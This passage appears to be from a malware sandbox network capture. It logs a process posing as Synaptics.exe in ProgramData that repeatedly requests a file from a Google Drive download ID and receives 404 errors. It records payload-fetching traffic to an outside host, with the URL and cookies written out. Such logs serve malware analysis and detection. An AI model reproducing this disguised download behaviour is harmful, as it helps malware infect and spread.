                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-F9H49tN0mxGEXD8F9w8QrQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:51 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:51 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4b 38 63 59 65 64 66 46 6f 43 36 63 71 33 79 71 4c 78 42 6b 39 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="K8cYedfFoC6cq3yqLxBk9Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:51 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    84192.168.2.949853142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:51 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:51 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:51 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-G3bK-ekiGWNzNqppFmlRPg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    85192.168.2.949856142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:52 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:52 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:52 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-6SanypZU6FBVAMLNUHUhPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    86192.168.2.949857142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:52 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:52 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4JtAQ2gGlGyOhTHfM3BPddoL2OrRHWFt48QlE9Q8PnOWeo1omrR8MWOfJzGBPruBx_
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:52 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-UyvE_SHWJefABK4uFAfPnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:52 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:52 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 69 34 47 31 46 51 6c 73 6f 77 56 32 41 41 68 71 54 69 77 56 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="Oi4G1FQlsowV2AAhqTiwVw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:52 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    87192.168.2.949859142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:52 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:52 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:52 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-TRULE2gK2eM2k00hcGUOpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    88192.168.2.949860142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:52 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:52 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC42zK-9Zkj0LXEoNdxqsVwikXZfQJHsfpVu7Mx-5vRWLKHsEhe8QqqcYmWZi-w73nkIZ6NgONA
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:52 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-31ZoMVaTgvf5rIikqJINOw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:52 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:52 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 65 46 4f 59 52 69 4f 35 48 33 66 4a 65 4a 53 63 6a 6a 72 47 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="CeFOYRiO5H3fJeJScjjrGQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:52 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    89192.168.2.949866142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:54 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:54 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:54 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Z03L5bcZ-0HIA5mPzYQO4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    90192.168.2.949867142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:54 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:54 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:54 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ab1qPa4Lq7XFgoYBZH19PQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    91192.168.2.949873142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:55 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
